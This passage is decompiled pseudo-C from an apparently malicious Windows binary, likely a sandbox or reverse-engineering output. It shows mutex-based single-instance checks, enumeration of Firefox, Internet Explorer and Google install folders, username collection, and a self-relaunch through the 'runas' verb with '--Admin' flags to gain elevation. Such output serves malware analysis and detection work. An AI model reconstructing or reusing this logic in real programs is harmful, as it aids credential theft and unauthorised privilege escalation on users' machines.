                                                                                    												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
                                                                                    												_t1292 = _t1268 + 4;
                                                                                    												_t1244 = 0;
                                                                                    												__eflags = 0;
                                                                                    												do {
                                                                                    													_t846 = _v16;
                                                                                    													_a20 =  *(_t846 + _t1244 * 4);
                                                                                    													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
                                                                                    													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
                                                                                    													E0042B420(_t950, 0, _t1215);
                                                                                    													_t1292 = _t1292 + 0x10;
                                                                                    													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
                                                                                    													lstrcatW(0x513290, _t950);
                                                                                    													_t1244 = _t1244 + 1;
                                                                                    													__eflags = _t1244 - 0xa;
                                                                                    												} while (_t1244 < 0xa);
                                                                                    												__eflags = lstrlenW(0x51a7c0);
                                                                                    												if(__eflags <= 0) {
                                                                                    													E0040E760(0x513278, __eflags);
                                                                                    													 *0x529225 = _a16;
                                                                                    													 *0x529226 = _a28;
                                                                                    													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
                                                                                    													 *0x513260 = _t856;
                                                                                    													WaitForSingleObject(_t856, 0xffffffff);
                                                                                    												}
                                                                                    												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
                                                                                    											}
                                                                                    											goto L82;
                                                                                    										} else {
                                                                                    											__eflags = _t950;
                                                                                    											if(_t950 != 0) {
                                                                                    												goto L62;
                                                                                    											} else {
                                                                                    												__eflags =  *0x513234 - _t950;
                                                                                    												if(__eflags != 0) {
                                                                                    													L81:
                                                                                    													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
                                                                                    													L82:
                                                                                    													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
                                                                                    													_t1231 = _v16;
                                                                                    													_t1269 = _t1268 + 4;
                                                                                    													_a340 = 0xf;
                                                                                    													_t1204 = 0;
                                                                                    													__eflags = 0;
                                                                                    													_a336 = 0;
                                                                                    													_a320 = 0;
                                                                                    													do {
                                                                                    														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
                                                                                    														__eflags =  *_t1167;
                                                                                    														if( *_t1167 != 0) {
                                                                                    															_t986 = _t1167;
                                                                                    															_t950 = _t986 + 1;
                                                                                    															do {
                                                                                    																_t585 =  *_t986;
                                                                                    																_t986 = _t986 + 1;
                                                                                    																__eflags = _t585;
                                                                                    															} while (_t585 != 0);
                                                                                    															_t987 = _t986 - _t950;
                                                                                    															__eflags = _t987;
                                                                                    														} else {
                                                                                    															_t987 = 0;
                                                                                    														}
                                                                                    														_push(_t987);
                                                                                    														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
                                                                                    														_t1204 = _t1204 + 1;
                                                                                    														__eflags = _t1204 - 0xa;
                                                                                    													} while (_t1204 < 0xa);
                                                                                    													_t1270 = _t1269 - 0x18;
                                                                                    													_v20 = 0;
                                                                                    													_t1168 = _t1270;
                                                                                    													_t1205 =  &_v20;
                                                                                    													 *(_t1168 + 0x14) = 7;
                                                                                    													 *(_t1168 + 0x10) = 0;
                                                                                    													 *_t1168 = 0;
                                                                                    													__eflags =  *0x51a7c0;
                                                                                    													if( *0x51a7c0 != 0) {
                                                                                    														_t989 = 0x51a7c0;
                                                                                    														_t201 =  &(_t989[1]); // 0x51a7c2
                                                                                    														_t1231 = _t201;
                                                                                    														do {
                                                                                    															_t588 =  *_t989;
                                                                                    															_t989 =  &(_t989[1]);
                                                                                    															__eflags = _t588;
                                                                                    														} while (_t588 != 0);
                                                                                    														_t990 = _t989 - _t1231;
                                                                                    														__eflags = _t990;
                                                                                    														_t991 = _t990 >> 1;
                                                                                    													} else {
                                                                                    														_t991 = 0;
                                                                                    													}
                                                                                    													_push(_t991);
                                                                                    													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
                                                                                    													_t590 = E00412840( &_v20, 0);
                                                                                    													_t1271 = _t1270 + 0x18;
                                                                                    													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
                                                                                    													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
                                                                                    														_t590 =  *_t590;
                                                                                    													}
                                                                                    													E00410FC0(_t590, _t1205);
                                                                                    													__eflags = _a4 - 0x10;
                                                                                    													_t1232 = _v28;
                                                                                    													if(_a4 >= 0x10) {
                                                                                    														L00422587(_v16);
                                                                                    														_t1271 = _t1271 + 4;
                                                                                    													}
                                                                                    													_t592 = lstrlenA(_v24);
                                                                                    													__eflags = _t592 - 0x20;
                                                                                    													if(_t592 == 0x20) {
                                                                                    														_t1272 = _t1271 - 0x18;
                                                                                    														_t1171 = _t1272;
                                                                                    														_t952 = 0;
                                                                                    														 *(_t1171 + 0x14) = 7;
                                                                                    														 *(_t1171 + 0x10) = 0;
                                                                                    														 *_t1171 = 0;
                                                                                    														__eflags =  *0x51a7c0;
                                                                                    														if( *0x51a7c0 != 0) {
                                                                                    															_t995 = 0x51a7c0;
                                                                                    															_t210 =  &(_t995[1]); // 0x51a7c2
                                                                                    															_t1205 = _t210;
                                                                                    															do {
                                                                                    																_t594 =  *_t995;
                                                                                    																_t995 =  &(_t995[1]);
                                                                                    																__eflags = _t594;
                                                                                    															} while (_t594 != 0);
                                                                                    															_t996 = _t995 - _t1205;
                                                                                    															__eflags = _t996;
                                                                                    															_t997 = _t996 >> 1;
                                                                                    														} else {
                                                                                    															_t997 = 0;
                                                                                    														}
                                                                                    														_push(_t997);
                                                                                    														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
                                                                                    														_t596 = E00412840( &_v24, _t952);
                                                                                    														_t1273 = _t1272 + 0x18;
                                                                                    														__eflags = _t596[0x14] - 0x10;
                                                                                    														if(_t596[0x14] >= 0x10) {
                                                                                    															_t596 =  *_t596;
                                                                                    														}
                                                                                    														lstrcpyA(_t1232 + 0x28, _t596);
                                                                                    														__eflags = _v0 - 0x10;
                                                                                    														if(_v0 >= 0x10) {
                                                                                    															L00422587(_v20);
                                                                                    															_t1273 = _t1273 + 4;
                                                                                    														}
                                                                                    														__eflags =  *0x521cf0;
                                                                                    														if( *0x521cf0 != 0) {
                                                                                    															_t1000 = 0x521cf0;
                                                                                    															_t216 =  &(_t1000[1]); // 0x521cf2
                                                                                    															_t1173 = _t216;
                                                                                    															do {
                                                                                    																_t599 =  *_t1000;
                                                                                    																_t1000 =  &(_t1000[1]);
                                                                                    																__eflags = _t599;
                                                                                    															} while (_t599 != 0);
                                                                                    															_t1001 = _t1000 - _t1173;
                                                                                    															__eflags = _t1001;
                                                                                    															_t1002 = _t1001 >> 1;
                                                                                    														} else {
                                                                                    															_t1002 = 0;
                                                                                    														}
                                                                                    														_push(_t1002);
                                                                                    														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
                                                                                    														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
                                                                                    														_t1233 = _v36;
                                                                                    														_t1274 = _t1273 + 4;
                                                                                    														_a248 = 0xf;
                                                                                    														_t1206 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_a244 = 0;
                                                                                    														_a228 = 0;
                                                                                    														do {
                                                                                    															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
                                                                                    															__eflags =  *_t1175;
                                                                                    															if( *_t1175 != 0) {
                                                                                    																_t1005 = _t1175;
                                                                                    																_t952 = _t1005 + 1;
                                                                                    																do {
                                                                                    																	_t602 =  *_t1005;
                                                                                    																	_t1005 = _t1005 + 1;
                                                                                    																	__eflags = _t602;
                                                                                    																} while (_t602 != 0);
                                                                                    																_t1006 = _t1005 - _t952;
                                                                                    																__eflags = _t1006;
                                                                                    															} else {
                                                                                    																_t1006 = 0;
                                                                                    															}
                                                                                    															_push(_t1006);
                                                                                    															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
                                                                                    															_t1206 = _t1206 + 1;
                                                                                    															__eflags = _t1206 - 0xa;
                                                                                    														} while (_t1206 < 0xa);
                                                                                    														_t1275 = _t1274 - 0x18;
                                                                                    														_t1008 = _t1275;
                                                                                    														_push(0xffffffff);
                                                                                    														 *(_t1008 + 0x14) = 0xf;
                                                                                    														 *(_t1008 + 0x10) = 0;
                                                                                    														 *_t1008 = 0;
                                                                                    														E00413FF0(0, _t1008,  &_a228, 0);
                                                                                    														_t1207 = E00412900( &_v40, 0);
                                                                                    														_t955 = _v52 + 0x828;
                                                                                    														_t1276 = _t1275 + 0x18;
                                                                                    														__eflags = _t955 - _t1207;
                                                                                    														if(_t955 != _t1207) {
                                                                                    															__eflags = _t955[5] - 8;
                                                                                    															if(_t955[5] >= 8) {
                                                                                    																L00422587( *_t955);
                                                                                    																_t1276 = _t1276 + 4;
                                                                                    															}
                                                                                    															_t955[5] = 7;
                                                                                    															_t955[4] = 0;
                                                                                    															 *_t955 = 0;
                                                                                    															__eflags = _t1207[5] - 8;
                                                                                    															if(_t1207[5] >= 8) {
                                                                                    																 *_t955 =  *_t1207;
                                                                                    																 *_t1207 = 0;
                                                                                    															} else {
                                                                                    																_t839 = _t1207[4] + 1;
                                                                                    																__eflags = _t839;
                                                                                    																if(_t839 != 0) {
                                                                                    																	E004205A0(_t955, _t1207, _t839 + _t839);
                                                                                    																	_t1276 = _t1276 + 0xc;
                                                                                    																}
                                                                                    															}
                                                                                    															_t955[4] = _t1207[4];
                                                                                    															_t955[5] = _t1207[5];
                                                                                    															__eflags = 0;
                                                                                    															_t1207[5] = 7;
                                                                                    															_t1207[4] = 0;
                                                                                    															 *_t1207 = 0;
                                                                                    														}
                                                                                    														__eflags = _v12 - 8;
                                                                                    														if(__eflags >= 0) {
                                                                                    															L00422587(_v32);
                                                                                    															_t1276 = _t1276 + 4;
                                                                                    														}
                                                                                    														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
                                                                                    														_t1234 = _v40;
                                                                                    														_t1277 = _t1276 + 4;
                                                                                    														_a220 = 0xf;
                                                                                    														_t1208 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_a216 = 0;
                                                                                    														_a200 = 0;
                                                                                    														do {
                                                                                    															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
                                                                                    															__eflags =  *_t1178;
                                                                                    															if( *_t1178 != 0) {
                                                                                    																_t1011 = _t1178;
                                                                                    																_t955 = _t1011 + 1;
                                                                                    																do {
                                                                                    																	_t608 =  *_t1011;
                                                                                    																	_t1011 = _t1011 + 1;
                                                                                    																	__eflags = _t608;
                                                                                    																} while (_t608 != 0);
                                                                                    																_t1012 = _t1011 - _t955;
                                                                                    																__eflags = _t1012;
                                                                                    															} else {
                                                                                    																_t1012 = 0;
                                                                                    															}
                                                                                    															_push(_t1012);
                                                                                    															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
                                                                                    															_t1208 = _t1208 + 1;
                                                                                    															__eflags = _t1208 - 0xa;
                                                                                    														} while (_t1208 < 0xa);
                                                                                    														_t1278 = _t1277 - 0x18;
                                                                                    														_t1014 = _t1278;
                                                                                    														_push(0xffffffff);
                                                                                    														 *(_t1014 + 0x14) = 0xf;
                                                                                    														 *(_t1014 + 0x10) = 0;
                                                                                    														 *_t1014 = 0;
                                                                                    														E00413FF0(0, _t1014,  &_a196, 0);
                                                                                    														_t1209 = E00412900( &_v48, 0);
                                                                                    														_t958 = _v60 + 0x840;
                                                                                    														_t1279 = _t1278 + 0x18;
                                                                                    														__eflags = _t958 - _t1209;
                                                                                    														if(_t958 != _t1209) {
                                                                                    															__eflags = _t958[5] - 8;
                                                                                    															if(_t958[5] >= 8) {
                                                                                    																L00422587( *_t958);
                                                                                    																_t1279 = _t1279 + 4;
                                                                                    															}
                                                                                    															_t958[5] = 7;
                                                                                    															_t958[4] = 0;
                                                                                    															 *_t958 = 0;
                                                                                    															__eflags = _t1209[5] - 8;
                                                                                    															if(_t1209[5] >= 8) {
                                                                                    																 *_t958 =  *_t1209;
                                                                                    																 *_t1209 = 0;
                                                                                    															} else {
                                                                                    																_t828 = _t1209[4] + 1;
                                                                                    																__eflags = _t828;
                                                                                    																if(_t828 != 0) {
                                                                                    																	E004205A0(_t958, _t1209, _t828 + _t828);
                                                                                    																	_t1279 = _t1279 + 0xc;
                                                                                    																}
                                                                                    															}
                                                                                    															_t958[4] = _t1209[4];
                                                                                    															_t958[5] = _t1209[5];
                                                                                    															__eflags = 0;
                                                                                    															_t1209[5] = 7;
                                                                                    															_t1209[4] = 0;
                                                                                    															 *_t1209 = 0;
                                                                                    														}
                                                                                    														__eflags = _v20 - 8;
                                                                                    														if(__eflags >= 0) {
                                                                                    															L00422587(_v40);
                                                                                    															_t1279 = _t1279 + 4;
                                                                                    														}
                                                                                    														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
                                                                                    														_t1235 = _v48;
                                                                                    														_t1280 = _t1279 + 4;
                                                                                    														_a284 = 0xf;
                                                                                    														_t1210 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_a280 = 0;
                                                                                    														_a264 = 0;
                                                                                    														do {
                                                                                    															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
                                                                                    															__eflags =  *_t1181;
                                                                                    															if( *_t1181 != 0) {
                                                                                    																_t1017 = _t1181;
                                                                                    																_t958 = _t1017 + 1;
                                                                                    																do {
                                                                                    																	_t614 =  *_t1017;
                                                                                    																	_t1017 = _t1017 + 1;
                                                                                    																	__eflags = _t614;
                                                                                    																} while (_t614 != 0);
                                                                                    																_t1018 = _t1017 - _t958;
                                                                                    																__eflags = _t1018;
                                                                                    															} else {
                                                                                    																_t1018 = 0;
                                                                                    															}
                                                                                    															_push(_t1018);
                                                                                    															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
                                                                                    															_t1210 = _t1210 + 1;
                                                                                    															__eflags = _t1210 - 0xa;
                                                                                    														} while (_t1210 < 0xa);
                                                                                    														_t1281 = _t1280 - 0x18;
                                                                                    														_t1020 = _t1281;
                                                                                    														_push(0xffffffff);
                                                                                    														 *(_t1020 + 0x14) = 0xf;
                                                                                    														 *(_t1020 + 0x10) = 0;
                                                                                    														 *_t1020 = 0;
                                                                                    														E00413FF0(0, _t1020,  &_a260, 0);
                                                                                    														_t618 = E00412900( &_v56, 0);
                                                                                    														_t1236 = _v68;
                                                                                    														_t1211 = _t618;
                                                                                    														_t1282 = _t1281 + 0x18;
                                                                                    														_t960 = _t1236 + 0x870;
                                                                                    														__eflags = _t960 - _t1211;
                                                                                    														if(_t960 != _t1211) {
                                                                                    															__eflags = _t960[5] - 8;
                                                                                    															if(_t960[5] >= 8) {
                                                                                    																L00422587( *_t960);
                                                                                    																_t1282 = _t1282 + 4;
                                                                                    															}
                                                                                    															_t960[5] = 7;
                                                                                    															_t960[4] = 0;
                                                                                    															 *_t960 = 0;
                                                                                    															__eflags = _t1211[5] - 8;
                                                                                    															if(_t1211[5] >= 8) {
                                                                                    																 *_t960 =  *_t1211;
                                                                                    																 *_t1211 = 0;
                                                                                    															} else {
                                                                                    																_t817 = _t1211[4] + 1;
                                                                                    																__eflags = _t817;
                                                                                    																if(_t817 != 0) {
                                                                                    																	E004205A0(_t960, _t1211, _t817 + _t817);
                                                                                    																	_t1282 = _t1282 + 0xc;
                                                                                    																}
                                                                                    															}
                                                                                    															_t960[4] = _t1211[4];
                                                                                    															_t960[5] = _t1211[5];
                                                                                    															__eflags = 0;
                                                                                    															_t1211[5] = 7;
                                                                                    															_t1211[4] = 0;
                                                                                    															 *_t1211 = 0;
                                                                                    														}
                                                                                    														__eflags = _v28 - 8;
                                                                                    														if(_v28 >= 8) {
                                                                                    															L00422587(_v48);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0xb);
                                                                                    														_v28 = 7;
                                                                                    														_v32 = 0;
                                                                                    														_v48 = 0;
                                                                                    														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
                                                                                    														_t1237 = _t1236 + 0x888;
                                                                                    														E00413580(_t960, _t1236 + 0x888,  &_v56);
                                                                                    														__eflags = _v40 - 8;
                                                                                    														if(_v40 >= 8) {
                                                                                    															L00422587(_v52);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x27);
                                                                                    														_v32 = 7;
                                                                                    														_v36 = 0;
                                                                                    														_v52 = 0;
                                                                                    														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
                                                                                    														E00413580(_t960, _t1237,  &_v60);
                                                                                    														__eflags = _v44 - 8;
                                                                                    														if(_v44 >= 8) {
                                                                                    															L00422587(_v56);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x29);
                                                                                    														_v36 = 7;
                                                                                    														_v40 = 0;
                                                                                    														_v56 = 0;
                                                                                    														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
                                                                                    														E00413580(_t960, _t1237,  &_v64);
                                                                                    														__eflags = _v48 - 8;
                                                                                    														if(_v48 >= 8) {
                                                                                    															L00422587(_v60);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x1e);
                                                                                    														_v40 = 7;
                                                                                    														_v44 = 0;
                                                                                    														_v60 = 0;
                                                                                    														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
                                                                                    														E00413580(_t960, _t1237,  &_v68);
                                                                                    														__eflags = _v52 - 8;
                                                                                    														if(_v52 >= 8) {
                                                                                    															L00422587(_v64);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x21);
                                                                                    														_v44 = 7;
                                                                                    														_v48 = 0;
                                                                                    														_v64 = 0;
                                                                                    														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
                                                                                    														E00413580(_t960, _t1237,  &_v72);
                                                                                    														__eflags = _v56 - 8;
                                                                                    														if(_v56 >= 8) {
                                                                                    															L00422587(_v68);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x23);
                                                                                    														_v48 = 7;
                                                                                    														_v52 = 0;
                                                                                    														_v68 = 0;
                                                                                    														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
                                                                                    														E00413580(_t960, _t1237,  &_v76);
                                                                                    														__eflags = _v60 - 8;
                                                                                    														if(_v60 >= 8) {
                                                                                    															L00422587(_v72);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														_push(0x18);
                                                                                    														_v52 = 7;
                                                                                    														_v56 = 0;
                                                                                    														_v72 = 0;
                                                                                    														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
                                                                                    														E00413580(_t960, _t1237,  &_v80);
                                                                                    														__eflags = _v64 - 8;
                                                                                    														if(_v64 >= 8) {
                                                                                    															L00422587(_v76);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    														}
                                                                                    														E00413100( &_v76, _t1211, L"D:\\Windows\\");
                                                                                    														_v52 = E00415200( &_v36);
                                                                                    														_t353 = E00415610(_t648) + 0x880; // 0x880
                                                                                    														E00413580(_t960, _t353,  &_v80);
                                                                                    														E00413210( &_v84);
                                                                                    														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
                                                                                    														_t1212 = E00413920( &_v44);
                                                                                    														_t358 = _t1212 + 0x880; // 0x880
                                                                                    														_t961 = _t358;
                                                                                    														E00413580(_t358, _t358,  &_v88);
                                                                                    														E00413210( &_v92);
                                                                                    														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
                                                                                    														E00413580(_t961, _t961,  &_v96);
                                                                                    														E00413210( &_v100);
                                                                                    														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
                                                                                    														E00413580(_t961, _t961,  &_v104);
                                                                                    														E00413210( &_v108);
                                                                                    														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
                                                                                    														E00413580(_t961, _t961,  &_v112);
                                                                                    														E00413210( &_v116);
                                                                                    														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
                                                                                    														E00413580(_t961, _t961,  &_v120);
                                                                                    														E00413210( &_v124);
                                                                                    														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
                                                                                    														E00413580(_t961, _t961,  &_v128);
                                                                                    														E00413210( &_v132);
                                                                                    														_t375 = _t1212 + 0x868; // 0x868
                                                                                    														_t1238 = _t375;
                                                                                    														_t677 = E00413490(_t375, 0);
                                                                                    														__eflags =  *_t677 - 0x2e;
                                                                                    														if( *_t677 != 0x2e) {
                                                                                    															_t800 = E0041CDD0( &_v76, _t1238);
                                                                                    															_t1282 = _t1282 + 4;
                                                                                    															E004131D0(_t1238, _t800);
                                                                                    															E00413210( &_v80);
                                                                                    														}
                                                                                    														E0041C140(E00413560( &_v76), _t961);
                                                                                    														E00413600( &_v80);
                                                                                    														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
                                                                                    														_t1283 = _t1282 + 4;
                                                                                    														E00412C20( &_a300);
                                                                                    														_t962 = _v92;
                                                                                    														_t1239 = 0;
                                                                                    														do {
                                                                                    															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
                                                                                    															_t1239 = _t1239 + 1;
                                                                                    															__eflags = _t1239 - 0xa;
                                                                                    														} while (_t1239 < 0xa);
                                                                                    														_v8 = 0x100;
                                                                                    														GetUserNameW( &_a388,  &_v8);
                                                                                    														E00413930( &_v76);
                                                                                    														_t1284 = _t1283 - 0x18;
                                                                                    														E00412C40(_t1284, _t1212, "|");
                                                                                    														_t1285 = _t1284 - 0x18;
                                                                                    														E00412BF0(_t1285,  &_a300);
                                                                                    														E0040ECB0( &_v84);
                                                                                    														_t1286 = _t1285 + 0x30;
                                                                                    														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
                                                                                    														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
                                                                                    														__eflags = _t697;
                                                                                    														if(_t697 != 0) {
                                                                                    															do {
                                                                                    																_t782 = E00412F40(E0041C430( &_v88));
                                                                                    																_t1290 = _t1286 - 0x18;
                                                                                    																E00412C40(_t1290, _t1212, _t782);
                                                                                    																_t784 = E00412900( &_v8, 0);
                                                                                    																_t400 = _t1212 + 0x880; // 0x880
                                                                                    																E00413580(_t962, _t400, _t784);
                                                                                    																E00413210( &_v12);
                                                                                    																_t788 = E00413100( &_a96, _t1212,  &_a380);
                                                                                    																_t789 = E00413100( &_v16, _t1212, L"%username%");
                                                                                    																_t405 = _t1212 + 0x880; // 0x880
                                                                                    																_t1239 = _t789;
                                                                                    																_t790 = E00413660(_t405);
                                                                                    																_t406 = _t1212 + 0x880; // 0x880
                                                                                    																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
                                                                                    																_t1286 = _t1290 + 0x1c;
                                                                                    																E00413210( &_v24);
                                                                                    																E00413210( &_a84);
                                                                                    																E0041C440( &_v108);
                                                                                    																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
                                                                                    																__eflags = _t799;
                                                                                    															} while (_t799 != 0);
                                                                                    														}
                                                                                    														_t414 = _t1212 + 0x880; // 0x880
                                                                                    														E004136C0(_t414,  &_a204);
                                                                                    														E0040CA70(_t962,  &_v36, _t1212, _t1239);
                                                                                    														_t416 = _t1212 + 0x850; // 0x850
                                                                                    														E004130B0(_t1286 - 0x18, _t416);
                                                                                    														E0040C740();
                                                                                    														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
                                                                                    														E0041BA10(_a4);
                                                                                    														_t707 = E0041BA80(_a4);
                                                                                    														__eflags = _t707;
                                                                                    														if(_t707 != 0) {
                                                                                    															 *(_t1212 + 0x8c0) = 0;
                                                                                    															 *_t1212 =  *0x51323c;
                                                                                    															E00413560( &_v4);
                                                                                    															E00410A50( &_v4);
                                                                                    															E0041C140(E00413560( &_v32),  &_v4);
                                                                                    															E00413600( &_v36);
                                                                                    															E00413100( &_v36, _t1212, L"F:\\");
                                                                                    															E00413580(_t962,  &_v12,  &_v40);
                                                                                    															E00413210( &_v44);
                                                                                    															E00413640( &_v16,  &_v100);
                                                                                    															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
                                                                                    															__eflags = _t723;
                                                                                    															if(_t723 != 0) {
                                                                                    																_t966 = _v48;
                                                                                    																do {
                                                                                    																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
                                                                                    																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
                                                                                    																	L214();
                                                                                    																	_t770 = E0041C2F0();
                                                                                    																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
                                                                                    																	_t1239 = _t770;
                                                                                    																	E0041B8B0(_t966, _t1239, _t966);
                                                                                    																	_t773 = E004134B0(E0041C470( &_v100));
                                                                                    																	_t441 = _t1239 + 0x8a4; // 0x8a4
                                                                                    																	E00413260(_t441, _t1212, _t773);
                                                                                    																	 *((char*)(_t1239 + 0x8e0)) = 1;
                                                                                    																	E0041FA10(E0041C3D0(), _t1239);
                                                                                    																	E004138D0( &_v108);
                                                                                    																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
                                                                                    																	__eflags = _t780;
                                                                                    																} while (_t780 != 0);
                                                                                    															}
                                                                                    															 *0x529238 =  *0x51323c;
                                                                                    															E0041FDC0(0x529238);
                                                                                    															_t727 = GetMessageW( &_a272, 0, 0, 0);
                                                                                    															__eflags = _t727;
                                                                                    															if(_t727 != 0) {
                                                                                    																do {
                                                                                    																	TranslateMessage( &_a276);
                                                                                    																	DispatchMessageW( &_a276);
                                                                                    																	_t765 = GetMessageW( &_a276, 0, 0, 0);
                                                                                    																	__eflags = _t765;
                                                                                    																} while (_t765 != 0);
                                                                                    															}
                                                                                    															_t728 =  *0x513250;
                                                                                    															__eflags = _t728;
                                                                                    															if(_t728 != 0) {
                                                                                    																PostThreadMessageW(_t728, 0x12, 0, 0);
                                                                                    																do {
                                                                                    																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                    																	__eflags = _t754;
                                                                                    																	if(_t754 != 0) {
                                                                                    																		do {
                                                                                    																			DispatchMessageW( &_a104);
                                                                                    																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                    																			__eflags = _t759;
                                                                                    																		} while (_t759 != 0);
                                                                                    																	}
                                                                                    																	_t755 = WaitForSingleObject( *0x513240, 0xa);
                                                                                    																	__eflags = _t755 - 0x102;
                                                                                    																} while (_t755 == 0x102);
                                                                                    															}
                                                                                    															_t729 =  *0x51324c;
                                                                                    															__eflags = _t729;
                                                                                    															if(_t729 != 0) {
                                                                                    																PostThreadMessageW(_t729, 0x12, 0, 0);
                                                                                    																do {
                                                                                    																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                    																	__eflags = _t746;
                                                                                    																	if(_t746 != 0) {
                                                                                    																		do {
                                                                                    																			DispatchMessageW( &_a104);
                                                                                    																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                    																			__eflags = _t751;
                                                                                    																		} while (_t751 != 0);
                                                                                    																	}
                                                                                    																	_t747 = WaitForSingleObject( *0x513248, 0xa);
                                                                                    																	__eflags = _t747 - 0x102;
                                                                                    																} while (_t747 == 0x102);
                                                                                    															}
                                                                                    															__eflags =  *0x513234;
                                                                                    															_t730 =  *0x513230;
                                                                                    															if( *0x513234 == 0) {
                                                                                    																_t730 =  *0x513238;
                                                                                    															}
                                                                                    															__eflags = _t730;
                                                                                    															if(_t730 != 0) {
                                                                                    																CloseHandle(_t730);
                                                                                    															}
                                                                                    															_t1242 = _a284;
                                                                                    															E00413600( &_v4);
                                                                                    														} else {
                                                                                    															_t1242 = 0;
                                                                                    														}
                                                                                    														E004139D0( &_v76);
                                                                                    														E00412D50( &_a304);
                                                                                    														E00412D50( &_a228);
                                                                                    														E00412D50( &_a156);
                                                                                    														E00412D50( &_a180);
                                                                                    													} else {
                                                                                    														_t1242 = 0;
                                                                                    													}
                                                                                    													E00412D50( &_a252);
                                                                                    												} else {
                                                                                    													_t868 = GetVersion();
                                                                                    													__eflags = _t868 - 5;
                                                                                    													if(_t868 <= 5) {
                                                                                    														goto L60;
                                                                                    													} else {
                                                                                    														lstrcpyW( &_a968, L"--Admin");
                                                                                    														lstrcatW( &_a968, L" IsNotAutoStart");
                                                                                    														lstrcatW( &_a968, L" IsNotTask");
                                                                                    														E0042B420( &_a400, 0, 0x38);
                                                                                    														_a396.cbSize = 0x3c;
                                                                                    														_a412 =  &_a3248;
                                                                                    														_t1268 = _t1268 + 0xc;
                                                                                    														_a400 = 0;
                                                                                    														_a416 =  &_a968;
                                                                                    														_t879 = _t1230 + 0x10;
                                                                                    														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
                                                                                    														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
                                                                                    															_t879 =  *_t879;
                                                                                    														}
                                                                                    														_a420 = _t879;
                                                                                    														_a424 = 5;
                                                                                    														_a408 = L"runas";
                                                                                    														_t881 = ShellExecuteExW( &_a396); // executed
                                                                                    														__eflags = _t881;
                                                                                    														if(_t881 == 0) {
                                                                                    															L61:
                                                                                    															_t581 = _a16;
                                                                                    															goto L62;
                                                                                    														} else {
                                                                                    															_t1242 = 0;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										}
